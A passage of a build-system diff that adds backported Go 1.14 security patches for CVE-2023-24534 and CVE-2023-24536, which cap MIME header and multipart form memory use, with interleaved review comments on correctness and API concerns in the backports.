537+ return r.nextPart(false, maxMIMEHeaderSize)
538 }
539
540 // NextRawPart returns the next part in the multipart or an error.
541@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
542 // Unlike NextPart, it does not have special handling for
543 // "Content-Transfer-Encoding: quoted-printable".
544 func (r *Reader) NextRawPart() (*Part, error) {
545- return r.nextPart(true)
546+ return r.nextPart(true, maxMIMEHeaderSize)
547 }
548
549-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
550+func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
551 if r.currentPart != nil {
552 r.currentPart.Close()
553 }
554@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
555
556 if r.isBoundaryDelimiterLine(line) {
557 r.partsRead++
558- bp, err := newPart(r, rawPart)
559+ bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
560 if err != nil {
561 return nil, err
562 }
563diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
564new file mode 100644
565index 0000000..6836928
566--- /dev/null
567+++ b/src/mime/multipart/readmimeheader.go
568@@ -0,0 +1,14 @@
569+// Copyright 2023 The Go Authors. All rights reserved.
570+// Use of this source code is governed by a BSD-style
571+// license that can be found in the LICENSE file.
572+package multipart
573+
574+import (
575+ "net/textproto"
576+ _ "unsafe" // for go:linkname
577+)
578+
579+// readMIMEHeader is defined in package net/textproto.
580+//
581+//go:linkname readMIMEHeader net/textproto.readMIMEHeader
582+func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
583diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
584index 94133ee..170d3f5 100644
585--- a/src/net/http/request_test.go
586+++ b/src/net/http/request_test.go
587@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
588 t.Errorf("FormFile file = %v, want nil", f)
589 }
590 if fh != nil {
591- t.Errorf("FormFile file header = %q, want nil", fh)
592+ t.Errorf("FormFile file header = %v, want nil", fh)
593 }
594 if err != ErrMissingFile {
595 t.Errorf("FormFile err = %q, want ErrMissingFile", err)
596diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
597index f63f5ec..96553fb 100644
598--- a/src/net/textproto/reader.go
599+++ b/src/net/textproto/reader.go
600@@ -7,9 +7,11 @@ package textproto
601 import (
602 "bufio"
603 "bytes"
604+ "errors"
605 "fmt"
606 "io"
607 "io/ioutil"
608+ "math"
609 "strconv"
610 "strings"
611 "sync"
612@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
613 // }
614 //
615 func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
616+ return readMIMEHeader(r, math.MaxInt64)
617+}
618+
619+// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
620+// It is called by the mime/multipart package.
621+func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
622 // Avoid lots of small slice allocations later by allocating one
623 // large one ahead of time which we'll cut up into smaller
624 // slices. If this isn't big enough later, we allocate small ones.
625@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
626 continue
627 }
628
629+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
630+ //
631+ // value is computed as
632+ // value := string(bytes.TrimLeft(v, " \t"))
633+ //
634+ // in the original patch from 1.19. This relies on
635+ // 'v' which does not exist in 1.14. We leave the
636+ // 1.14 method unchanged.
637+
638 // Skip initial spaces in value.
639 i++ // skip colon
640 for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
641@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
642 value := string(kv[i:])
643
644 vv := m[key]
645+ if vv == nil {
646+ lim -= int64(len(key))
647+ lim -= 100 // map entry overhead
648+ }
649+ lim -= int64(len(value))
650+ if lim < 0 {
651+ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
652+ // to allow mime/multipart to detect it.
653+ return m, errors.New("message too large")
654+ }
655 if vv == nil && len(strs) > 0 {
656 // More than likely this will be a single-element key.
657 // Most headers aren't multi-valued.
658--
6592.25.1
660
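Review bot: In `readForm`, `maxFileMemoryBytes := maxMemory` followed by `io.CopyN(&b, p, maxFileMemoryBytes+1)` wraps to a negative count when the caller passes `math.MaxInt64`, an input the earlier patch on this page explicitly treats as valid (`TestReadFormMaxMemoryOverflow`). As far as I can tell, `io.CopyN` with a negative count copies nothing and returns no error, so `n > maxFileMemoryBytes` is false and the file part is stored with empty `content`; the existing test would not notice because its message carries a value part, not a file part. Clamping right after the assignment avoids the wrap: `if maxFileMemoryBytes == math.MaxInt64 { maxFileMemoryBytes-- }`. Separately, the added tests call `t.Setenv`, `t.TempDir` and `io.ReadAll`, which as far as I know postdate Go 1.14, so `formdata_test.go` is unlikely to compile in this tree if anyone runs the package tests.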
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
1From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Fri, 10 Mar 2023 14:21:05 -0800
4Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
5 the number of MIME header keys
6
7Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
8Run-TryBot: Damien Neil <dneil@google.com>
9Reviewed-by: Roland Shoemaker <bracewell@google.com>
10Reviewed-by: Julie Qiu <julieqiu@google.com>
11(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
12Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
13Reviewed-by: Damien Neil <dneil@google.com>
14Run-TryBot: Roland Shoemaker <bracewell@google.com>
15Change-Id: I675451438d619a9130360c56daf529559004903f
16Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
17Run-TryBot: Michael Knyszek <mknyszek@google.com>
18TryBot-Result: Gopher Robot <gobot@golang.org>
19Reviewed-by: Matthew Dempsky <mdempsky@google.com>
20Auto-Submit: Michael Knyszek <mknyszek@google.com>
21
22Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
23CVE: CVE-2023-24534
24Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
25---
26 src/bytes/bytes.go | 13 +++++++
27 src/net/textproto/reader.go | 31 +++++++++++------
28 src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
29 3 files changed, 92 insertions(+), 11 deletions(-)
30
31diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
32index e872cc2..1f0d760 100644
33--- a/src/bytes/bytes.go
34+++ b/src/bytes/bytes.go
35@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
36 return -1
37 }
38
39+// Cut slices s around the first instance of sep,
40+// returning the text before and after sep.
41+// The found result reports whether sep appears in s.
42+// If sep does not appear in s, cut returns s, nil, false.
43+//
44+// Cut returns slices of the original slice s, not copies.
45+func Cut(s, sep []byte) (before, after []byte, found bool) {
46+ if i := Index(s, sep); i >= 0 {
47+ return s[:i], s[i+len(sep):], true
48+ }
49+ return s, nil, false
50+}
51+
52 func indexRabinKarp(s, sep []byte) int {
53 // Rabin-Karp search
54 hashsep, pow := hashStr(sep)
55diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
56index a505da9..8d547fe 100644
57--- a/src/net/textproto/reader.go
58+++ b/src/net/textproto/reader.go
59@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
60 // large one ahead of time which we'll cut up into smaller
61 // slices. If this isn't big enough later, we allocate small ones.
62 var strs []string
63- hint := r.upcomingHeaderNewlines()
64+ hint := r.upcomingHeaderKeys()
65 if hint > 0 {
66+ if hint > 1000 {
67+ hint = 1000 // set a cap to avoid overallocation
68+ }
69 strs = make([]string, hint)
70 }
71
72@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
73 return nil
74 }
75
76-// upcomingHeaderNewlines returns an approximation of the number of newlines
77+var nl = []byte("\n")
78+
79+// upcomingHeaderKeys returns an approximation of the number of keys
80 // that will be in this header. If it gets confused, it returns 0.
81-func (r *Reader) upcomingHeaderNewlines() (n int) {
82+func (r *Reader) upcomingHeaderKeys() (n int) {
83 // Try to determine the 'hint' size.
84 r.R.Peek(1) // force a buffer load if empty
85 s := r.R.Buffered()
86@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
87 return
88 }
89 peek, _ := r.R.Peek(s)
90- for len(peek) > 0 {
91- i := bytes.IndexByte(peek, '\n')
92- if i < 3 {
93- // Not present (-1) or found within the next few bytes,
94- // implying we're at the end ("\r\n\r\n" or "\n\n")
95- return
96+ for len(peek) > 0 && n < 1000 {
97+ var line []byte
98+ line, peek, _ = bytes.Cut(peek, nl)
99+ if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
100+ // Blank line separating headers from the body.
101+ break
102+ }
103+ if line[0] == ' ' || line[0] == '\t' {
104+ // Folded continuation of the previous line.
105+ continue
106 }
107 n++
108- peek = peek[i+1:]
109 }
110- return
111+ return n
112 }
113
114 // CanonicalMIMEHeaderKey returns the canonical format of the
115diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
116index 3124d43..3ae0de1 100644
117--- a/src/net/textproto/reader_test.go
118+++ b/src/net/textproto/reader_test.go
119@@ -9,6 +9,7 @@ import (
120 "bytes"
121 "io"
122 "reflect"
123+ "runtime"
124 "strings"
125 "testing"
126 )
127@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
128 }
129 }
130
131+// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
132+// difficult to test well via the external API.
133+func TestReaderUpcomingHeaderKeys(t *testing.T) {
134+ for _, test := range []struct {
135+ input string
136+ want int
137+ }{{
138+ input: "",
139+ want: 0,
140+ }, {
141+ input: "A: v",
142+ want: 1,
143+ }, {
144+ input: "A: v\r\nB: v\r\n",
145+ want: 2,
146+ }, {
147+ input: "A: v\nB: v\n",
148+ want: 2,
149+ }, {
150+ input: "A: v\r\n continued\r\n still continued\r\nB: v\r\n\r\n",
151+ want: 2,
152+ }, {
153+ input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
154+ want: 1,
155+ }, {
156+ input: "A: v" + strings.Repeat("\n", 1000),
157+ want: 1,
158+ }} {
159+ r := reader(test.input)
160+ got := r.upcomingHeaderKeys()
161+ if test.want != got {
162+ t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
163+ }
164+ }
165+}
166+
167 func TestReadMIMEHeaderNoKey(t *testing.T) {
168 r := reader(": bar\ntest-1: 1\n\n")
169 m, err := r.ReadMIMEHeader()
170@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
171 }
172 }
173
174+// Test that reading a header doesn't overallocate. Issue 58975.
175+func TestReadMIMEHeaderAllocations(t *testing.T) {
176+ var totalAlloc uint64
177+ const count = 200
178+ for i := 0; i < count; i++ {
179+ r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
180+ var m1, m2 runtime.MemStats
181+ runtime.ReadMemStats(&m1)
182+ _, err := r.ReadMIMEHeader()
183+ if err != nil {
184+ t.Fatalf("ReadMIMEHeader: %v", err)
185+ }
186+ runtime.ReadMemStats(&m2)
187+ totalAlloc += m2.TotalAlloc - m1.TotalAlloc
188+ }
189+ // 32k is large and we actually allocate substantially less,
190+ // but prior to the fix for #58975 we allocated ~400k in this case.
191+ if got, want := totalAlloc/count, uint64(32768); got > want {
192+ t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
193+ }
194+}
195+
196 type readResponseTest struct {
197 in string
198 inCode int
199--
2002.25.1
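Review bot: The `src/bytes/bytes.go` hunk adds an exported `bytes.Cut` to the Go 1.14 standard library, apparently only so that `upcomingHeaderKeys` can call it, which widens the public API of the shipped toolchain beyond what a stock 1.14 offers. Code built with this patched toolchain could start depending on `bytes.Cut` and then fail to compile against any other 1.14 build. An unexported helper next to its only caller keeps the security fix self-contained: `func cut(s, sep []byte) (before, after []byte, found bool)` in `src/net/textproto/reader.go` with the same body (calling `bytes.Index`), and `line, peek, _ = cut(peek, nl)` at the call site.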
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
1From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Thu, 16 Mar 2023 14:18:04 -0700
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
5 buffer allocations in ReadForm
6
7When copying form data to disk with io.Copy,
8allocate only one copy buffer and reuse it rather than
9creating two buffers per file (one from io.multiReader.WriteTo,
10and a second one from os.File.ReadFrom).
11
12Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
13
14For CVE-2023-24536
15For #59153
16For #59269
17
18Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
19Run-TryBot: Damien Neil <dneil@google.com>
20Reviewed-by: Julie Qiu <julieqiu@google.com>
21Reviewed-by: Roland Shoemaker <bracewell@google.com>
22Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
23Run-TryBot: Roland Shoemaker <bracewell@google.com>
24Reviewed-by: Damien Neil <dneil@google.com>
25Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
26Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
27Run-TryBot: Michael Knyszek <mknyszek@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29Auto-Submit: Michael Knyszek <mknyszek@google.com>
30Reviewed-by: Matthew Dempsky <mdempsky@google.com>
31
32Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
33CVE: CVE-2023-24536
34Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
35---
36 src/mime/multipart/formdata.go | 15 +++++++--
37 src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
38 2 files changed, 61 insertions(+), 3 deletions(-)
39
40diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
41index a7d4ca97f0484..975dcb6b26db4 100644
42--- a/src/mime/multipart/formdata.go
43+++ b/src/mime/multipart/formdata.go
44@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
45 maxMemoryBytes = math.MaxInt64
46 }
47 }
48+ var copyBuf []byte
49 for {
50 p, err := r.nextPart(false, maxMemoryBytes)
51 if err == io.EOF {
52@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
53 }
54 }
55 numDiskFiles++
56- size, err := io.Copy(file, io.MultiReader(&b, p))
57+ if _, err := file.Write(b.Bytes()); err != nil {
58+ return nil, err
59+ }
60+ if copyBuf == nil {
61+ copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
62+ }
63+ // os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
64+ type writerOnly struct{ io.Writer }
65+ remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
66 if err != nil {
67 return nil, err
68 }
69 fh.tmpfile = file.Name()
70- fh.Size = size
71+ fh.Size = int64(b.Len()) + remainingSize
72 fh.tmpoff = fileOff
73- fileOff += size
74+ fileOff += fh.Size
75 if !combineFiles {
76 if err := file.Close(); err != nil {
77 return nil, err
78diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
79index 5cded7170c6b8..f5b56083b2377 100644
80--- a/src/mime/multipart/formdata_test.go
81+++ b/src/mime/multipart/formdata_test.go
82@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
83 t.Fatalf("temp dir contains %v files; want 0", len(names))
84 }
85 }
86+
87+func BenchmarkReadForm(b *testing.B) {
88+ for _, test := range []struct {
89+ name string
90+ form func(fw *Writer, count int)
91+ }{{
92+ name: "fields",
93+ form: func(fw *Writer, count int) {
94+ for i := 0; i < count; i++ {
95+ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
96+ fmt.Fprintf(w, "value %v", i)
97+ }
98+ },
99+ }, {
100+ name: "files",
101+ form: func(fw *Writer, count int) {
102+ for i := 0; i < count; i++ {
103+ w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
104+ fmt.Fprintf(w, "value %v", i)
105+ }
106+ },
107+ }} {
108+ b.Run(test.name, func(b *testing.B) {
109+ for _, maxMemory := range []int64{
110+ 0,
111+ 1 << 20,
112+ } {
113+ var buf bytes.Buffer
114+ fw := NewWriter(&buf)
115+ test.form(fw, 10)
116+ if err := fw.Close(); err != nil {
117+ b.Fatal(err)
118+ }
119+ b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
120+ b.ReportAllocs()
121+ for i := 0; i < b.N; i++ {
122+ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
123+ form, err := fr.ReadForm(maxMemory)
124+ if err != nil {
125+ b.Fatal(err)
126+ }
127+ form.RemoveAll()
128+ }
129+
130+ })
131+ }
132+ })
133+ }
134+}
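Review bot: `fh.Size = int64(b.Len()) + remainingSize` is only correct because `b.Bytes()` leaves the buffer undrained, so `b.Len()` still equals the prefix just passed to `file.Write`; nothing in the hunk says so. The value is more than bookkeeping: with combined temp files, `fh.tmpoff` and `fh.Size` bound the `io.NewSectionReader` window in `FileHeader.Open` (added by CVE-2022-41725.patch on this page), so a miscount would let one part's reader run into a neighbouring part's bytes. I would add `// b.Bytes() does not consume b, so b.Len() is the prefix written above` on that line. `readForm`'s body starts and ends outside both formdata.go hunks.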
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
1From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Thu, 16 Mar 2023 16:56:12 -0700
4Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
5 improve accounting of non-file data
6
7For requests containing large numbers of small parts,
8memory consumption of a parsed form could be about 250%
9over the estimated size.
10
11When considering the size of parsed forms, account for the size of
12FileHeader structs and increase the estimate of memory consumed by
13map entries.
14
15Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
16
17For CVE-2023-24536
18For #59153
19For #59269
20
21Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
22Run-TryBot: Damien Neil <dneil@google.com>
23Reviewed-by: Roland Shoemaker <bracewell@google.com>
24Reviewed-by: Julie Qiu <julieqiu@google.com>
25Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
26Run-TryBot: Roland Shoemaker <bracewell@google.com>
27Reviewed-by: Damien Neil <dneil@google.com>
28Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
29Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
30Reviewed-by: Matthew Dempsky <mdempsky@google.com>
31Auto-Submit: Michael Knyszek <mknyszek@google.com>
32TryBot-Result: Gopher Robot <gobot@golang.org>
33Run-TryBot: Michael Knyszek <mknyszek@google.com>
34
35Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
36CVE: CVE-2023-24536
37Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
38---
39 src/mime/multipart/formdata.go | 9 +++--
40 src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
41 src/net/textproto/reader.go | 8 ++++-
42 3 files changed, 37 insertions(+), 35 deletions(-)
43
44diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
45index 975dcb6b26db4..3f6ff697ca608 100644
46--- a/src/mime/multipart/formdata.go
47+++ b/src/mime/multipart/formdata.go
48@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
49 // Multiple values for the same key (one map entry, longer slice) are cheaper
50 // than the same number of values for different keys (many map entries), but
51 // using a consistent per-value cost for overhead is simpler.
52+ const mapEntryOverhead = 200
53 maxMemoryBytes -= int64(len(name))
54- maxMemoryBytes -= 100 // map overhead
55+ maxMemoryBytes -= mapEntryOverhead
56 if maxMemoryBytes < 0 {
57 // We can't actually take this path, since nextPart would already have
58 // rejected the MIME headers for being too large. Check anyway.
59@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
60 }
61
62 // file, store in memory or on disk
63+ const fileHeaderSize = 100
64 maxMemoryBytes -= mimeHeaderSize(p.Header)
65+ maxMemoryBytes -= mapEntryOverhead
66+ maxMemoryBytes -= fileHeaderSize
67 if maxMemoryBytes < 0 {
68 return nil, ErrMessageTooLarge
69 }
70@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
71 }
72
73 func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
74+ size = 400
75 for k, vs := range h {
76 size += int64(len(k))
77- size += 100 // map entry overhead
78+ size += 200 // map entry overhead
79 for _, v := range vs {
80 size += int64(len(v))
81 }
82diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
83index f5b56083b2377..8ed26e0c34081 100644
84--- a/src/mime/multipart/formdata_test.go
85+++ b/src/mime/multipart/formdata_test.go
86@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
87 // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
88 // while processing non-file form data as well as file form data.
89 func TestReadForm_NonFileMaxMemory(t *testing.T) {
90- n := 10<<20 + 25
91 if testing.Short() {
92- n = 10<<10 + 25
93+ t.Skip("skipping in -short mode")
94 }
95+ n := 10 << 20
96 largeTextValue := strings.Repeat("1", n)
97 message := `--MyBoundary
98 Content-Disposition: form-data; name="largetext"
99@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
100 ` + largeTextValue + `
101 --MyBoundary--
102 `
103-
104 testBody := strings.ReplaceAll(message, "\n", "\r\n")
105- testCases := []struct {
106- name string
107- maxMemory int64
108- err error
109- }{
110- {"smaller", 50 + int64(len("largetext")) + 100, nil},
111- {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
112- {"too-large", 0, ErrMessageTooLarge},
113- }
114- for _, tc := range testCases {
115- t.Run(tc.name, func(t *testing.T) {
116- if tc.maxMemory == 0 && testing.Short() {
117- t.Skip("skipping in -short mode")
118- }
119- b := strings.NewReader(testBody)
120- r := NewReader(b, boundary)
121- f, err := r.ReadForm(tc.maxMemory)
122- if err == nil {
123- defer f.RemoveAll()
124- }
125- if tc.err != err {
126- t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
127- }
128- if err == nil {
129- if g := f.Value["largetext"][0]; g != largeTextValue {
130- t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
131- }
132- }
133- })
134+ // Try parsing the form with increasing maxMemory values.
135+ // Changes in how we account for non-file form data may cause the exact point
136+ // where we change from rejecting the form as too large to accepting it to vary,
137+ // but we should see both successes and failures.
138+ const failWhenMaxMemoryLessThan = 128
139+ for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
140+ b := strings.NewReader(testBody)
141+ r := NewReader(b, boundary)
142+ f, err := r.ReadForm(maxMemory)
143+ if err != nil {
144+ continue
145+ }
146+ if g := f.Value["largetext"][0]; g != largeTextValue {
147+ t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
148+ }
149+ f.RemoveAll()
150+ if maxMemory < failWhenMaxMemoryLessThan {
151+ t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
152+ }
153+ return
154 }
155+ t.Errorf("ReadForm(x) failed for x < 1024, expect success")
156 }
157
158 // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
159diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
160index 9a21777df8be0..c1284fde25eb7 100644
161--- a/src/net/textproto/reader.go
162+++ b/src/net/textproto/reader.go
163@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
164
165 m := make(MIMEHeader, hint)
166
167+ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
168+ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
169+ // MIMEHeaders average about 200 bytes per entry.
170+ lim -= 400
171+ const mapEntryOverhead = 200
172+
173 // The first line cannot start with a leading space.
174 if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
175 line, err := r.readLineSlice()
176@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
177 vv := m[key]
178 if vv == nil {
179 lim -= int64(len(key))
180- lim -= 100 // map entry overhead
181+ lim -= mapEntryOverhead
182 }
183 lim -= int64(len(value))
184 if lim < 0 {
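Review bot: The overhead estimates that bound parsed-form memory are written three different ways in this patch: readForm gets `const mapEntryOverhead = 200`, mimeHeaderSize uses the bare literals `size = 400` and `size += 200`, and readMIMEHeader in net/textproto uses `lim -= 400` with its own `mapEntryOverhead`. The accounting is only consistent if both packages charge the same amounts, so mimeHeaderSize deserves a comment such as `// 400 and 200 mirror the per-header and per-entry overhead charged in net/textproto.readMIMEHeader`. The textproto comment says the figures come from benchmarking go1.20, while this file lands under go-1.14; whether they remain a safe upper bound for that runtime is not shown here and is worth confirming. Both functions continue outside the inner hunks.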
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
1From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Mon, 20 Mar 2023 10:43:19 -0700
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
5
6The parsed forms of MIME headers and multipart forms can consume
7substantially more memory than the size of the input data.
8A malicious input containing a very large number of headers or
9form parts can cause excessively large memory allocations.
10
11Set limits on the size of MIME data:
12
13Reader.NextPart and Reader.NextRawPart limit the the number
14of headers in a part to 10000.
15
16Reader.ReadForm limits the total number of headers in all
17FileHeaders to 10000.
18
19Both of these limits may be set with with
20GODEBUG=multipartmaxheaders=<values>.
21
22Reader.ReadForm limits the number of parts in a form to 1000.
23This limit may be set with GODEBUG=multipartmaxparts=<value>.
24
25Thanks for Jakob Ackermann (@das7pad) for reporting this issue.
26
27For CVE-2023-24536
28For #59153
29For #59269
30
31Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
32Run-TryBot: Damien Neil <dneil@google.com>
33Reviewed-by: Roland Shoemaker <bracewell@google.com>
34Reviewed-by: Julie Qiu <julieqiu@google.com>
35Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
36Reviewed-by: Damien Neil <dneil@google.com>
37Run-TryBot: Roland Shoemaker <bracewell@google.com>
38Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
39Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
40Run-TryBot: Michael Knyszek <mknyszek@google.com>
41Auto-Submit: Michael Knyszek <mknyszek@google.com>
42TryBot-Result: Gopher Robot <gobot@golang.org>
43Reviewed-by: Matthew Dempsky <mdempsky@google.com>
44
45Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
46CVE: CVE-2023-24536
47Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
48---
49 src/mime/multipart/formdata.go | 19 ++++++++-
50 src/mime/multipart/formdata_test.go | 61 ++++++++++++++++++++++++++++
51 src/mime/multipart/multipart.go | 31 ++++++++++----
52 src/mime/multipart/readmimeheader.go | 2 +-
53 src/net/textproto/reader.go | 19 +++++----
54 5 files changed, 115 insertions(+), 17 deletions(-)
55
56diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
57index 216cccb..0b508ae 100644
58--- a/src/mime/multipart/formdata.go
59+++ b/src/mime/multipart/formdata.go
60@@ -13,6 +13,7 @@ import (
61 "math"
62 "net/textproto"
63 "os"
64+ "strconv"
65 )
66
67 // ErrMessageTooLarge is returned by ReadForm if the message form
68@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
69 numDiskFiles := 0
70 multipartFiles := godebug.Get("multipartfiles")
71 combineFiles := multipartFiles != "distinct"
72+ maxParts := 1000
73+ multipartMaxParts := godebug.Get("multipartmaxparts")
74+ if multipartMaxParts != "" {
75+ if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
76+ maxParts = v
77+ }
78+ }
79+ maxHeaders := maxMIMEHeaders()
80+
81 defer func() {
82 if file != nil {
83 if cerr := file.Close(); err == nil {
